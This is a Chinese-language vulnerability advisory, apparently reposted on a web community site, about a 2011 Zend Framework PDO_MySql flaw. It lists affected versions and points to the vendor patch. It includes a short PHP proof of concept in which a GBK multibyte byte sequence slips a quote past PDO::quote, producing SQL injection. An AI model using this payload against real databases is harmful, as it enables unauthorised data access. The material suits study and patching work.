Zend Framework "PDO_MySql"安全限制绕过漏洞

发布于 2022-10-15 05:24:42 字数 1815 浏览 19 评论 0

Zend Framework "PDO_MySql"安全限制绕过漏洞

发布日期:2011-05-19
更新日期:2011-05-30

受影响系统:
Zend Zend Framework 1.11.4
Zend Zend Framework 1.11.3
Zend Zend Framework 1.10.4
Zend Zend Framework 1.10.3
Zend Zend Framework 1.10.2
不受影响系统:
Zend Zend Framework 1.11.6
Zend Zend Framework 1.10.9
描述:
--------------------------------------------------------------------------------
BUGTRAQ  ID: 47919

Zend Framework (ZF) 是一个开放源代码的 PHP5 开发框架,可用于来开发 web 程序和服务。

Zend Framework在实现上存在"PDO_MySql"安全限制绕过漏洞,远程攻击者可利用此漏洞绕过某些安全限制,利用SQL注入漏洞。

<*来源:Anthony Ferrara
  *>

测试方法:
--------------------------------------------------------------------------------
警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

  1. $dsn = 'mysql:dbname=INFORMATION_SCHEMA;host=127.0.0.1;charset=GBK';
  2. $pdo = new PDO($dsn, $user, $pass);
  3. $pdo->exec('SET NAMES GBK');
  4. $string = chr(0xbf) . chr(0x27) . ' OR 1 = 1; /*';
  5. $sql = "SELECT TABLE_NAME
  6.             FROM INFORMATION_SCHEMA.TABLES
  7.             WHERE TABLE_NAME LIKE ".$pdo->quote($string).";";
  8. $stmt = $pdo->query($sql);
  9. var_dump($stmt->rowCount());

复制代码建议:
--------------------------------------------------------------------------------
厂商补丁:

Zend
----
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:

http://www.zend.com/downloads

如果你对这篇内容有疑问,欢迎到本站社区发帖提问 参与讨论,获取更多帮助,或者扫码二维码加入 Web 技术交流群。

扫码二维码加入Web技术交流群

发布评论

需要 登录 才能够评论, 你可以免费 注册 一个本站的账号。
列表为空,暂无数据
我们使用 Cookies 和其他技术来定制您的体验包括您的登录状态等。通过阅读我们的 隐私政策 了解更多相关信息。 单击 接受 或继续使用网站,即表示您同意使用 Cookies 和您的相关数据。
原文